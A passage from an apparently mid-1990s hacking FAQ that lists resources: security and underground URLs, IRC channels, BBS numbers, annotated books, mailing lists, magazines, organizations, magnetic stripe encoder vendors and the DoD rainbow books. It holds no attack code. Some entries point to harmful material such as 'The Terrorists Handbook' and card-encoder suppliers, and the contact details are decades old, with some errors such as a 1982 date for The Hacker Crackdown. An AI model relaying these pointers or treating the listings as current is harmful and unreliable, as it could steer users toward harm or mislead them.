  3988. http://www.csd.harris.com/secure_info.html      (Harris)
  3989. http://www.csl.sri.com                          (SRI Computer Science Lab)
  3990. http://www.cygnus.com/data/cns.html             (Cygnus Network Security)
  3991. http://www.datafellows.fi                       (Data Fellows)
  3992. http://www.delmarva.com/raptor/raptor.html      (Raptor Eagle Network Isolator)
  3993. http://www.demon.co.uk/kbridge                  (KarlBridge)
  3994. http://www.digicash.com/ecash/ecash-home.html   (Digital Cash)
  3995. http://www.digital.com/info/key-secure-index.html(Digital Secure Systems)
  3996. http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html(Bugtraq)
  3997. http://www.eecs.nwu.edu/~jmyers/ids/index.html  (Intrusion Detection Systems)
  3998. http://www.engin.umich.edu/~jgotts/boxes.html   (Box info)
  3999. http://www.engin.umich.edu/~jgotts/hack-faq.html(This document)
  4000. http://www.engin.umich.edu/~jgotts/underground.html
  4001. http://www.ensta.fr/internet/unix/sys_admin     (System administration)
  4002. http://www.fc.net/defcon                        (DefCon)
  4003. http://www.greatcircle.com                      (Great Circle Associates)
  4004. http://www.hpcc.gov/blue94/section.4.6.html     (NSA)
  4005. http://www.ic.gov                               (The CIA)
  4006. http://www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
  4007. http://www.lysator.liu.se:7500/terror/thb_title.html (The Terrorists Handbook)
  4008. http://www.lysator.liu.se:7500/mit-guide/mit-guide.html (MIT Lockpicking Guide)
  4009. http://www.net23.com                            (Max Headroom)
  4010. http://www.nist.gov                             (NIST)
  4011. http://www.pacbell.com                          (Pacific Bell)
  4012. http://www.paranoia.com/mthreat                 (ToneLoc)
  4013. http://www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
  4014. http://www.phantom.com/~king                    (Taran King)
  4015. http://www.quadralay.com/www/Crypt/Crypt.html   (Quadralay Cryptography Archive
  4016. )
  4017. http://www.research.att.com                     (AT&T)
  4018. http://www.rsa.com                              (RSA Data Security)
  4019. http://www.satelnet.org/~ccappuc
  4020. http://www.service.com/cm/uswest/usw1.html      (USWest)
  4021. http://www.shore.net/~oz/welcome.html           (Hack TV)
  4022. http://www.spy.org                              (Computer Systems Consulting)
  4023. http://www.sri.com                              (SRI)
  4024. http://www.tansu.com.au/Info/security.html      (Security Reference Index)
  4025. http://www.tis.com                              (Trusted Information Systems)
  4026. http://www.tri.sbc.com                          (Southwestern Bell)
  4027. http://www.uci.agh.edu.pl/pub/security          (Security)
  4028. http://www.umcc.umich.edu/~doug/virus-faq.html  (Virus)
  4029. http://www.wam.umd.edu/~ankh/Public/devil_does_unix
  4030. http://www.wiltel.com                           (Wiltel)
  4031. http://www.wired.com                            (Wired Magazine)
  4032.  
  4033.  
  4034. 06. What are some IRC channels of interest to hackers?
  4035.  
  4036. #2600
  4037. #cellular
  4038. #hack
  4039. #phreak
  4040. #linux
  4041. #root
  4042. #unix
  4043. #warez
  4044.  
  4045.  
  4046. 07. What are some BBS's of interest to hackers?
  4047.  
  4048. Hacker's Haven          (303)343-4053
  4049. Corrupt Sekurity        (303)753-1719
  4050. Independent Nation      (315)656-4179
  4051. underworld_1994.com     (514)683-1894
  4052. Digital Fallout         (516)378-6640
  4053. Alliance Communications (612)251-8596
  4054. Apocalypse 2000         (708)676-9855
  4055. K0dE Ab0dE              (713)579-2276
  4056. fARM R0Ad 666           (713)855-0261
  4057.  
  4058.  
  4059. 08. What books are available on this subject?
  4060.  
  4061.  
  4062. General Computer Security
  4063. ~~~~~~~~~~~~~~~~~~~~~~~~~
  4064. Computer Security Basics
  4065. Author: Deborah Russell and G.T. Gengemi Sr.
  4066. Publisher: O'Reilly & Associates, Inc.
  4067. Copyright Date: 1991
  4068. ISBN: 0-937175-71-4
  4069.  
  4070.         This is an excellent book.  It gives a broad overview of
  4071.         computer security without sacrificing detail.  A must read for
  4072.         the beginning security expert.
  4073.  
  4074. Computer Security Management
  4075. Author: Karen Forcht
  4076. Publisher: Boyd and Fraser
  4077. Copyright Date: 1994
  4078. ISBN: 0-87835-881-1
  4079.  
  4080. Information Systems Security
  4081. Author: Philip Fites and Martin Kratz
  4082. Publisher: Van Nostrad Reinhold
  4083. Copyright Date: 1993
  4084. ISBN: 0-442-00180-0
  4085.  
  4086. Computer Related Risks
  4087. Author: Peter G. Neumann
  4088. Publisher: Addison-Wesley
  4089. Copyright Date: 1995
  4090. ISBN: 0-201-55805-X
  4091.  
  4092. Computer Security Management
  4093. Author: Karen Forcht
  4094. Publisher: boyd & fraser publishing company
  4095. Copyright Date: 1994
  4096. ISBN: 0-87835-881-1
  4097.  
  4098.  
  4099. Unix System Security
  4100. ~~~~~~~~~~~~~~~~~~~~
  4101. Practical Unix Security
  4102. Author: Simson Garfinkel and Gene Spafford
  4103. Publisher: O'Reilly & Associates, Inc.
  4104. Copyright Date: 1991
  4105. ISBN: 0-937175-72-2
  4106.  
  4107.         Finally someone with a very firm grasp of Unix system security
  4108.         gets down to writing a book on the subject.  Buy this book.
  4109.         Read this book.
  4110.  
  4111. Firewalls and Internet Security
  4112. Author: William Cheswick and Steven Bellovin
  4113. Publisher: Addison Wesley
  4114. Copyright Date: 1994
  4115. ISBN: 0-201-63357-4
  4116.  
  4117. Unix System Security
  4118. Author: Rik Farrow
  4119. Publisher: Addison Wesley
  4120. Copyright Date: 1991
  4121. ISBN: 0-201-57030-0
  4122.  
  4123. Unix Security: A Practical Tutorial
  4124. Author: N. Derek Arnold
  4125. Publisher: McGraw Hill
  4126. Copyright Date: 1993
  4127. ISBN: 0-07-002560-6
  4128.  
  4129. Unix System Security: A Guide for Users and Systems Administrators
  4130. Author: David A. Curry
  4131. Publisher: Addison-Wesley
  4132. Copyright Date: 1992
  4133. ISBN: 0-201-56327-4
  4134.  
  4135. Unix System Security
  4136. Author: Patrick H. Wood and Stephen G. Kochan
  4137. Publisher: Hayden Books
  4138. Copyright Date: 1985
  4139. ISBN: 0-672-48494-3
  4140.  
  4141. Unix Security for the Organization
  4142. Author: Richard Bryant
  4143. Publisher: Sams
  4144. Copyright Date: 1994
  4145. ISBN: 0-672-30571-2
  4146.  
  4147.  
  4148. Network Security
  4149. ~~~~~~~~~~~~~~~~
  4150. Network Security Secrets
  4151. Author: David J. Stang and Sylvia Moon
  4152. Publisher: IDG Books
  4153. Copyright Date: 1993
  4154. ISBN: 1-56884-021-7
  4155.  
  4156.         Not a total waste of paper, but definitely not worth the
  4157.         $49.95 purchase price.  The book is a rehash of previously
  4158.         published information.  The only secret we learn from reading
  4159.         the book is that Sylvia Moon is a younger woman madly in love
  4160.         with the older David Stang.
  4161.  
  4162. Complete Lan Security and Control
  4163. Author: Peter Davis
  4164. Publisher: Windcrest / McGraw Hill
  4165. Copyright Date: 1994
  4166. ISBN: 0-8306-4548-9 and 0-8306-4549-7
  4167.  
  4168. Network Security
  4169. Author: Steven Shaffer and Alan Simon
  4170. Publisher: AP Professional
  4171. Copyright Date: 1994
  4172. ISBN: 0-12-638010-4
  4173.  
  4174.  
  4175. Cryptography
  4176. ~~~~~~~~~~~~
  4177. Applied Cryptography: Protocols, Algorithms, and Source Code in C
  4178. Author: Bruce Schneier
  4179. Publisher: John Wiley & Sons
  4180. Copyright Date: 1994
  4181. ISBN: 0-471-59756-2
  4182.  
  4183.         Bruce Schneier's book replaces all other texts on
  4184.         cryptography.  If you are interested in cryptography, this is
  4185.         a must read.  This may be the first and last book on
  4186.         cryptography you may ever need to buy.
  4187.  
  4188. Cryptography and Data Security
  4189. Author: Dorothy Denning
  4190. Publisher: Addison-Wesley Publishing Co.
  4191. Copyright Date: 1982
  4192. ISBN: 0-201-10150-5
  4193.  
  4194. Protect Your Privacy: A Guide for PGP Users
  4195. Author: William Stallings
  4196. Publisher: Prentice-Hall
  4197. Copyright Date: 1994
  4198. ISBN: 0-13-185596-4
  4199.  
  4200.  
  4201. Programmed Threats
  4202. ~~~~~~~~~~~~~~~~~~
  4203. The Little Black Book of Computer Viruses
  4204. Author: Mark Ludwig
  4205. Publisher: American Eagle Publications
  4206. Copyright Date: 1990
  4207. ISBN: 0-929408-02-0
  4208.  
  4209.         The original, and still the best, book on computer viruses.
  4210.         No media hype here, just good clean technical information.
  4211.  
  4212. Computer Viruses, Artificial Life and Evolution
  4213. Author: Mark Ludwig
  4214. Publisher: American Eagle Publications
  4215. Copyright Date: 1993
  4216. ISBN: 0-929408-07-1
  4217.  
  4218. Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  4219.         Threats to Your System
  4220. Author: John McAfee and Colin Haynes
  4221. Publisher: St. Martin's Press
  4222. Copyright Date: 1989
  4223. ISBN: 0-312-03064-9 and 0-312-02889-X
  4224.  
  4225. The Virus Creation Labs: A Journey Into the Underground
  4226. Author: George Smith
  4227. Publisher: American Eagle Publications
  4228. Copyright Date: 1994
  4229. ISBN:
  4230.  
  4231.  
  4232. Telephony
  4233. ~~~~~~~~~
  4234. Engineering and Operations in the Bell System
  4235. Author: R.F. Rey
  4236. Publisher: Bell Telephont Laboratories
  4237. Copyright Date: 1983
  4238. ISBN: 0-932764-04-5
  4239.  
  4240.         Although hopelessly out of date, this book remains *THE* book
  4241.         on telephony.  This book is 100% Bell, and is loved by phreaks
  4242.         the world over.
  4243.  
  4244. Telephony: Today and Tomorrow
  4245. Author: Dimitris N. Chorafas
  4246. Publisher: Prentice-Hall
  4247. Copyright Date: 1984
  4248. ISBN: 0-13-902700-9
  4249.  
  4250. The Telecommunications Fact Book and Illustrated Dictionary
  4251. Author: Ahmed S. Khan
  4252. Publisher: Delmar Publishers, Inc.
  4253. Copyright Date: 1992
  4254. ISBN: 0-8273-4615-8
  4255.  
  4256.         I find this dictionary to be an excellent reference book on
  4257.         telephony, and I recommend it to anyone with serious
  4258.         intentions in the field.
  4259.  
  4260.  
  4261. Hacking History and Culture
  4262. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4263. The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  4264. Author: Bruce Sterling
  4265. Publisher: Bantam Books
  4266. Copyright Date: 1982
  4267. ISBN: 0-553-56370-X
  4268.  
  4269.         Bruce Sterling has recently released the book FREE to the net.
  4270.         The book is much easier to read in print form, and the
  4271.         paperback is only $5.99.  Either way you read it, you will be
  4272.         glad you did.  Mr. Sterling is an excellent science fiction
  4273.         author and has brought his talent with words to bear on the
  4274.         hacking culture.  A very enjoyable reading experience.
  4275.  
  4276. Cyberpunk
  4277. Author: Katie Hafner and John Markoff
  4278. Publisher: Simon and Schuster
  4279. Copyright Date: 1991
  4280. ISBN: 0-671-77879-X
  4281.  
  4282. The Cuckoo's Egg
  4283. Author: Cliff Stoll
  4284. Publisher: Simon and Schuster
  4285. Copyright Date: 1989
  4286. ISBN: 0-671-72688-9
  4287.  
  4288. Hackers: Heroes of the Computer Revolution
  4289. Author: Steven Levy
  4290. Publisher: Doubleday
  4291. Copyright Date: 1984
  4292. ISBN: 0-440-13495-6
  4293.  
  4294.  
  4295. Unclassified
  4296. ~~~~~~~~~~~~
  4297. The Hacker's Handbook
  4298. Author: Hugo Cornwall
  4299. Publisher: E. Arthur Brown Company
  4300. Copyright Date:
  4301. ISBN: 0-912579-06-4
  4302.  
  4303. Secrets of a Super Hacker
  4304. Author: The Knightmare
  4305. Publisher: Loompanics
  4306. Copyright Date: 1994
  4307. ISBN: 1-55950-106-5
  4308.  
  4309.         The Knightmare is no super hacker.  There is little or no real
  4310.         information in this book.  The Knightmare gives useful advice
  4311.         like telling you not to dress up before going trashing.
  4312.         The Knightmare's best hack is fooling Loompanics into
  4313.         publishing this garbage.
  4314.  
  4315. The Day The Phones Stopped
  4316. Author: Leonard Lee
  4317. Publisher: Primus / Donald I Fine, Inc.
  4318. Copyright Date: 1992
  4319. ISBN: 1-55611-286-6
  4320.  
  4321.         Total garbage.  Paranoid delusions of a lunatic.  Less factual
  4322.         data that an average issue of the Enquirer.
  4323.  
  4324. Information Warfare
  4325. Author: Winn Swartau
  4326. Publisher: Thunder Mountain Press
  4327. Copyright Date: 1994
  4328. ISBN: 1-56025-080-1
  4329.  
  4330. An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
  4331. Author: Doug Richardson
  4332. Publisher: Salamander Press
  4333. Copyright Date:
  4334. ISBN: 0-668-06497-8
  4335.  
  4336.  
  4337. 09. What are some mailing lists of interest to hackers?
  4338.  
  4339. Academic Firewalls
  4340. Reflector Address:
  4341. Registration Address: Send a message to majordomo@greatcircle.com
  4342.                       containing the line "subscribe firewalls user@host"
  4343.  
  4344. Bugtraq
  4345. Reflector Address:    bugtraq@crimelab.com
  4346. Registration Address: bugtraq-request@crimelab.com
  4347.  
  4348. Cert Tools
  4349. Reflector Address:    cert-tools@cert.org
  4350. Registration Address: cert-tools-request@cert.org
  4351.  
  4352. Computers and Society
  4353. Reflector Address:    Comp-Soc@limbo.intuitive.com
  4354. Registration Address: taylor@limbo.intuitive.com
  4355.  
  4356. Coordinated Feasibility Effort to Unravel State Data
  4357. Reflector Address:    ldc-sw@cpsr.org
  4358. Registration Address:
  4359.  
  4360. CPSR Announcement List
  4361. Reflector Address:    cpsr-announce@cpsr.org
  4362. Registration Address:
  4363.  
  4364. CPSR - Intellectual Property
  4365. Reflector Address:    cpsr-int-prop@cpsr.org
  4366. Registration Address:
  4367.  
  4368. CPSR - Internet Library
  4369. Reflector Address:    cpsr-library@cpsr.org
  4370. Registration Address:
  4371.  
  4372. DefCon Announcement List
  4373. Reflector Address:
  4374. Registration Address: Send a message to majordomo@fc.net containing
  4375.                       the line "subscribe dc-announce"
  4376.  
  4377. DefCon Chat List
  4378. Reflector Address:
  4379. Registration Address: Send a message to majordomo@fc.net containing
  4380.                       the line "subscribe dc-stuff"
  4381.  
  4382. Macintosh Security
  4383. Reflector Address:    mac-security@eclectic.com
  4384. Registration Address: mac-security-request@eclectic.com
  4385.  
  4386. NeXT Managers
  4387. Reflector Address:
  4388. Registration Address: next-managers-request@stolaf.edu
  4389.  
  4390. Phiber-Seream
  4391. Reflector Address:
  4392. Registration Address: Send a message to listserv@netcom.com
  4393.                       containing the line "subscribe phiber-scream user@host"
  4394.  
  4395. rfc931-users
  4396. Reflector Address:    rfc931-users@kramden.acf.nyu.edu
  4397. Registration Address: brnstnd@nyu.edu
  4398.  
  4399. RSA Users
  4400. Reflector Address:    rsaref-users@rsa.com
  4401. Registration Address: rsaref-users-request@rsa.com
  4402.  
  4403.  
  4404. 10. What are some print magazines of interest to hackers?
  4405.  
  4406. 2600 - The Hacker Quarterly
  4407. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4408. E-mail address: 2600@well.sf.ca.us
  4409.  
  4410. Subscription Address: 2600 Subscription Dept
  4411.                       PO Box 752
  4412.                       Middle Island, NY  11953-0752
  4413.  
  4414. Letters and article submission address: 2600 Editorial Dept
  4415.                                         PO Box 99
  4416.                                         Middle Island, NY  11953-0099
  4417.  
  4418. Subscriptions: United States: $21/yr individual, $50 corporate.
  4419.                Overseas: $30/yr individual, $65 corporate.
  4420.  
  4421.  
  4422. Gray Areas
  4423. ~~~~~~~~~~
  4424. Gray Areas examines gray areas of law and morality and subject matter
  4425. which is illegal, immoral and/oe controversial. Gray Areas explores
  4426. why hackers hack and puts hacking into a sociological framework of
  4427. deviant behavior.
  4428.  
  4429. E-Mail Address: grayarea@well.sf.ca.us
  4430. E-Mail Address: grayarea@netaxs.com
  4431.  
  4432. U.S. Mail Address: Gray Areas
  4433.                    PO Box 808
  4434.                    Broomall, PA 19008
  4435.  
  4436. Subscriptions: $26.00 4 issues first class
  4437.                $34.00 4 issues foreign (shipped air mail)
  4438.  
  4439.  
  4440. Wired
  4441. ~~~~~
  4442. Subscription Address: subscriptions@wired.com
  4443.                   or: Wired
  4444.                       PO Box 191826
  4445.                       San Francisco, CA 94119-9866
  4446.  
  4447. Letters and article submission address: guidelines@wired.com
  4448.                                     or: Wired
  4449.                                         544 Second Street
  4450.                                         San Francisco, CA 94107-1427
  4451.  
  4452. Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
  4453.  
  4454.  
  4455. Nuts & Volts
  4456. ~~~~~~~~~~~~
  4457. T& L Publications
  4458. 430 Princeland Court
  4459. Corona, CA 91719
  4460. (800)783-4624 (Voice) (Subscription Only Order Line)
  4461. (909)371-8497 (Voice)
  4462. (909)371-3052 (Fax)
  4463. CIS: 74262,3664
  4464.  
  4465.  
  4466. 11. What are some organizations of interest to hackers?
  4467.  
  4468. Computer Professionals for Social Responsibility (CPSR)
  4469. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4470. CPSR empowers computer professionals and computer users to advocate
  4471. for the responsible use of information technology and empowers all who
  4472. use computer technology to participate in the public debate.   As
  4473. technical experts, CPSR members provide the public and policymakers
  4474. with realistic assessments of the power, promise, and limitations of
  4475. computer technology.  As an organization of concerned citizens, CPSR
  4476. directs public attention to critical choices concerning the
  4477. applications of computing and how those choices affect society.
  4478.  
  4479. By matching unimpeachable technical information with policy
  4480. development savvy, CPSR uses minimum dollars to have maximum impact
  4481. and encourages broad public participation in the shaping of technology
  4482. policy.
  4483.  
  4484. Every project we undertake is based on five principles:
  4485.  
  4486. *  We foster and support public discussion of and public
  4487.    responsibility for decisions involving the use of computers in
  4488.    systems critical to society.
  4489.  
  4490. *  We work to dispel popular myths about the infallibility of
  4491.    technological systems.
  4492.  
  4493. *  We challenge the assumption that technology alone can solve
  4494.    political and social problems.
  4495.  
  4496. *  We critically examine social and technical issues within the
  4497.    computer profession, nationally and internationally.
  4498.  
  4499. *  We encourage the use of computer technology to improve the quality
  4500.    of life.
  4501.  
  4502. CPSR Membership Categories
  4503.   75  REGULAR MEMBER
  4504.   50  Basic member
  4505.  200  Supporting member
  4506.  500  Sponsoring member
  4507. 1000  Lifetime member
  4508.   20  Student/low income member
  4509.   50  Foreign subscriber
  4510.   50  Library/institutional subscriber
  4511.  
  4512. CPSR National Office
  4513. P.O. Box 717
  4514. Palo Alto, CA  94301
  4515. 415-322-3778
  4516. 415-322-3798 (FAX)
  4517. E-mail: cpsr@csli.stanford.edu
  4518.  
  4519.  
  4520. Electronic Frontier Foundation (EFF)
  4521. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4522. The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
  4523. of policies and activities that will advance freedom and openness in
  4524. computer-based communications. It is a member-supported, nonprofit
  4525. group that grew from the conviction that a new public interest
  4526. organization was needed in the information age; that this organization
  4527. would enhance and protect the democratic potential of new computer
  4528. communications technology. From the beginning, the EFF determined to
  4529. become an organization that would combine technical, legal, and public
  4530. policy expertise, and would apply these skills to the myriad issues
  4531. and concerns that arise whenever a new communications medium is born.
  4532.  
  4533. Memberships are $20.00 per year for students, $40.00 per year for
  4534. regular members, and $100.00 per year for organizations.
  4535.  
  4536. The Electronic Frontier Foundation, Inc.
  4537. 666 Pennsylvania Avenue S.E., Suite 303
  4538. Washington, D.C.  20003
  4539. +1 202 544 9237
  4540. +1 202 547 5481 FAX
  4541. Internet: eff@eff.org
  4542.  
  4543.  
  4544. Free Software Foundation (FSF)
  4545. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4546.  
  4547.  
  4548. GNU
  4549. ~~~
  4550.  
  4551.  
  4552. The League for Programming Freedom (LPF)
  4553. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4554. The League for Programming Freedom is an organization of people who
  4555. oppose the attempt to monopolize common user interfaces through "look
  4556. and feel" copyright lawsuits.  Some of us are programmers, who worry
  4557. that such monopolies will obstruct our work.  Some of us are users,
  4558. who want new computer systems to be compatible with the interfaces we
  4559. know.  Some are founders of hardware or software companies, such as
  4560. Richard P. Gabriel. Some of us are professors or researchers,
  4561. including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
  4562. Boyer and Patrick Winston.
  4563.  
  4564. "Look and feel" lawsuits aim to create a new class of government-
  4565. enforced monopolies broader in scope than ever before.  Such a system
  4566. of user-interface copyright would impose gratuitous incompatibility,
  4567. reduce competition, and stifle innovation.
  4568.  
  4569. We in the League hope to prevent these problems by preventing
  4570. user-interface copyright.  The League is NOT opposed to copyright law
  4571. as it was understood until 1986 -- copyright on particular programs.
  4572. Our aim is to stop changes in the copyright system which would take
  4573. away programmers' traditional freedom to write new programs compatible
  4574. with existing programs and practices.
  4575.  
  4576. Annual dues for individual members are $42 for employed professionals,
  4577. $10.50 for students, and $21 for others.  We appreciate activists, but
  4578. members who cannot contribute their time are also welcome.
  4579.  
  4580. To contact the League, phone (617) 243-4091, send Internet mail to the
  4581. address league@prep.ai.mit.edu, or write to:
  4582.  
  4583. League for Programming Freedom
  4584. 1 Kendall Square #143
  4585. P.O. Box 9171
  4586. Cambridge, MA 02139 USA
  4587.  
  4588.  
  4589. SotMesc
  4590. ~~~~~~~
  4591. Founded in 1989, SotMesc is dedicated to preserving the integrity and
  4592. cohesion of the computing society.  By promoting computer education,
  4593. liberties and efficiency, we believe we can secure freedoms for all
  4594. computer users while retaining privacy.
  4595.  
  4596. SotMesc maintains the CSP Internet mailing list, the SotMesc
  4597. Scholarship Fund, and the SotMesc Newsletter.
  4598.  
  4599. The SotMESC is financed partly by membership fees, and donations, but
  4600. mostly by selling hacking, cracking, phreaking, electronics, internet,
  4601. and virus information and programs on disk and bound paper media.
  4602.  
  4603. SotMesc memberships are $20 to students and $40 to regular members.
  4604.  
  4605. SotMESC
  4606. P.O. Box 573
  4607. Long Beach, MS  39560
  4608.  
  4609.  
  4610. Computer Emergency Response Team (CERT
  4611. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4612.  
  4613. CERT is the Computer Emergency Response Team that was formed by the
  4614. Defense Advanced Research Projects Agency (DARPA) in November 1988 in
  4615. response to the needs exhibited during the Internet worm incident.
  4616. The CERT charter is to work with the Internet community to facilitate
  4617. its response to computer security events involving Internet hosts, to
  4618. take proactive steps to raise the community's awareness of computer
  4619. security issues, and to conduct research targeted at improving the
  4620. security of existing systems.
  4621.  
  4622. CERT products and services include 24-hour technical assistance for
  4623. responding to computer security incidents, product vulnerability
  4624. assistance, technical documents, and seminars.  In addition, the team
  4625. maintains a number of mailing lists (including one for CERT
  4626. advisories) and provides an anonymous FTP server:  cert.org
  4627. (192.88.209.5), where security-related documents, past CERT
  4628. advisories, and tools are archived.
  4629.  
  4630. CERT contact information:
  4631.  
  4632. U.S. mail address
  4633.   CERT Coordination Center
  4634.   Software Engineering Institute
  4635.   Carnegie Mellon University
  4636.   Pittsburgh, PA 15213-3890
  4637.   U.S.A.
  4638.  
  4639. Internet E-mail address
  4640.   cert@cert.org
  4641.  
  4642. Telephone number
  4643.   +1 412-268-7090 (24-hour hotline)
  4644.     CERT Coordination Center personnel answer
  4645.     7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
  4646.     emergencies during other hours.
  4647.  
  4648. FAX number
  4649.   +1 412-268-6989
  4650.  
  4651.  
  4652. 12. Where can I purchase a magnetic stripe encoder/decoder?
  4653.  
  4654. CPU Advance
  4655. PO Box 2434
  4656. Harwood Station
  4657. Littleton, MA  01460
  4658. (508)624-4819 (Fax)
  4659.  
  4660. Omron Electronics, Inc.
  4661. One East Commerce Drive
  4662. Schaumburg, IL  60173
  4663. (800)556-6766 (Voice)
  4664. (708)843-7787 (Fax)
  4665.  
  4666. Security Photo Corporation
  4667. 1051 Commonwealth Avenue
  4668. Boston, MA 02215
  4669. (800)533-1162 (Voice)
  4670. (617)783-3200 (Voice)
  4671. (617)783-1966 (Voice)
  4672.  
  4673. Timeline Inc,
  4674. 23605 Telo Avenue
  4675. Torrence, CA 90505
  4676. (800)872-8878 (Voice)
  4677. (800)223-9977 (Voice)
  4678.  
  4679.  
  4680. 13. What are the rainbow books and how can I get them?
  4681.  
  4682. Orange Book
  4683. DoD 5200.28-STD
  4684. Department of Defense Trusted Computer System Evaluation Criteria
  4685.  
  4686. Green Book
  4687. CSC-STD-002-85
  4688. Department of Defense Password Management Guideline
  4689.  
  4690. Yellow Book
  4691. CSC-STD-003-85
  4692. Computer Security Requirements -- Guidance for Applying the Department
  4693. of Defense Trusted Computer System Evaluation Criteria in Specific
  4694. Environments
  4695.  
  4696. Yellow Book
  4697. CSC-STD-004-85
  4698. Technical Rationale Behind CSC-STD-003-85: Computer Security
  4699. Requirements.  Guidance for Applying the Department of Defense Trusted
  4700. Computer System Evaluation Criteria in Specific Environments.
  4701.  
  4702. Tan Book
  4703. NCSC-TG-001
  4704. A Guide to Understanding Audit in Trusted Systems
  4705.  
  4706. Bright Blue Book
  4707. NCSC-TG-002
  4708. Trusted Product Evaluation - A Guide for Vendors
  4709.  
  4710. Neon Orange Book
  4711. NCSC-TG-003
  4712. A Guide to Understanding Discretionary Access Control in Trusted
  4713. Systems
  4714.  
  4715. Teal Green Book
  4716. NCSC-TG-004
  4717. Glossary of Computer Security Terms
  4718.  
  4719. Red Book
  4720. NCSC-TG-005
  4721. Trusted Network Interpretation of the Trusted Computer System
  4722. Evaluation Criteria
  4723.  
  4724. Orange Book
  4725. NCSC-TG-006
  4726. A Guide to Understanding Configuration Management in Trusted Systems
  4727.  
  4728. Burgundy Book
  4729. NCSC-TG-007
  4730. A Guide to Understanding Design Documentation in Trusted Systems
  4731.  
  4732. Dark Lavender Book
  4733. NCSC-TG-008
  4734. A Guide to Understanding Trusted Distribution in Trusted Systems
  4735.  
  4736. Venice Blue Book
  4737. NCSC-TG-009
  4738. Computer Security Subsystem Interpretation of the Trusted Computer
  4739. System Evaluation Criteria
  4740.  
  4741. Aqua Book
  4742. NCSC-TG-010
  4743. A Guide to Understanding Security Modeling in Trusted Systems
  4744.  
  4745. Dark Red Book
  4746. NCSC-TG-011
  4747. Trusted Network Interpretation Environments Guideline -- Guidance for
  4748. Applying the Trusted Network Interpretation
  4749.  
  4750. Pink Book
  4751. NCSC-TG-013
  4752. Rating Maintenance Phase -- Program Document
  4753.  
  4754. Purple Book
  4755. NCSC-TG-014
  4756. Guidelines for Formal Verification Systems
  4757.  
  4758. Brown Book
  4759. NCSC-TG-015
  4760. A Guide to Understanding Trusted Facility Management
  4761.  
  4762. Yellow-Green Book
  4763. NCSC-TG-016
  4764. Guidelines for Writing Trusted Facility Manuals
  4765.  
  4766. Light Blue
  4767. NCSC-TG-017
  4768. A Guide to Understanding Identification and Authentication in Trusted
  4769. Systems
  4770.  
  4771. Light Blue Book
  4772. NCSC-TG-018
  4773. A Guide to Understanding Object Reuse in Trusted Systems
  4774.  
  4775. Blue Book
  4776. NCSC-TG-019
  4777. Trusted Product Evaluation Questionnaire
  4778.  
  4779. Gray Book
  4780. NCSC-TG-020A
  4781. Trusted Unix Working Group (TRUSIX) Rationale for Selecting
  4782. Access Control List Features for the Unix System
  4783.  
  4784. Lavender Book
  4785. NCSC-TG-021
  4786. Trusted Data Base Management System Interpretation of the Trusted
  4787. Computer System Evaluation Criteria
  4788.  
  4789. Yellow Book
  4790. NCSC-TG-022
  4791. A Guide to Understanding Trusted Recovery in Trusted Systems
  4792.  
  4793. Bright Orange Book
  4794. NCSC-TG-023
  4795. A Guide to Understandng Security Testing and Test Documentation in
  4796. Trusted Systems
  4797.  
  4798. Purple Book
  4799. NCSC-TG-024  (Volume 1/4)
  4800. A Guide to Procurement of Trusted Systems: An Introduction to
  4801. Procurement Initiators on Computer Security Requirements
  4802.  
  4803. Purple Book
  4804. NCSC-TG-024 (Volume 2/4)
  4805. A Guide to Procurement of Trusted Systems: Language for RFP
  4806. Specifications and Statements of Work - An Aid to Procurement
  4807. Initiators
  4808.  
  4809. Purple Book
  4810. NCSC-TG-024  (Volume 3/4)
  4811. A Guide to Procurement of Trusted Systems: Computer Security Contract
  4812. Data Requirements List and Data Item Description Tutorial
  4813.  
  4814. +Purple Book
  4815. +NCSC-TG-024  (Volume 4/4)
  4816. +A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
  4817. +Proposal Document - An Aid to Procurement Initiators and Contractors
  4818.  
  4819. Green Book
  4820. NCSC-TG-025
  4821. A Guide to Understanding Data Remanence in Automated Information
  4822. Systems
  4823.  
  4824. Hot Peach Book
  4825. NCSC-TG-026
  4826. A Guide to Writing the Security Features User's Guide for Trusted Systems
  4827.  
  4828. Turquiose Book
  4829. NCSC-TG-027
  4830. A Guide to Understanding Information System Security Officer
  4831. Responsibilities for Automated Information Systems
  4832.  
  4833. Violet Book
  4834. NCSC-TG-028
  4835. Assessing Controlled Access Protection
  4836.  
  4837. Blue Book
  4838. NCSC-TG-029
  4839. Introduction to Certification and Accreditation
  4840.  
  4841. Light Pink Book
  4842. NCSC-TG-030
  4843. A Guide to Understanding Covert Channel Analysis of Trusted Systems
  4844.  
  4845. C1 Technical Report-001
  4846. Computer Viruses: Prevention, Detection, and Treatment
  4847.  
  4848. *C Technical Report 79-91
  4849. *Integrity in Automated Information Systems
  4850.  
  4851. *C Technical Report 39-92
  4852. *The Design and Evaluation of INFOSEC systems: The Computer Security
  4853. *Contributions to the Composition Discussion
  4854.  
  4855. NTISSAM COMPUSEC/1-87
  4856. Advisory Memorandum on Office Automation Security Guideline
  4857.  
  4858. --
  4859.  
  4860. You can get your own free copy of any or all of the books by writing
  4861. or calling:
  4862.  
  4863.        INFOSEC Awareness Division
  4864.        ATTN: X711/IAOC
  4865.        Fort George G. Meade, MD  20755-6000
  4866.  
  4867.        Barbara Keller
  4868.        (410) 766-8729
  4869.  
  4870. If you ask to be put on the mailing list, you'll get a copy of each new
  4871. book as it comes out (typically a couple a year).
  4872.  
  4873. [* == I have not personally seen this book]
  4874. [+ == I have not personally seen this book, and I believe it may not]
  4875. [     be available]
  4876.  
  4877.  
  4878.  
  4879.  
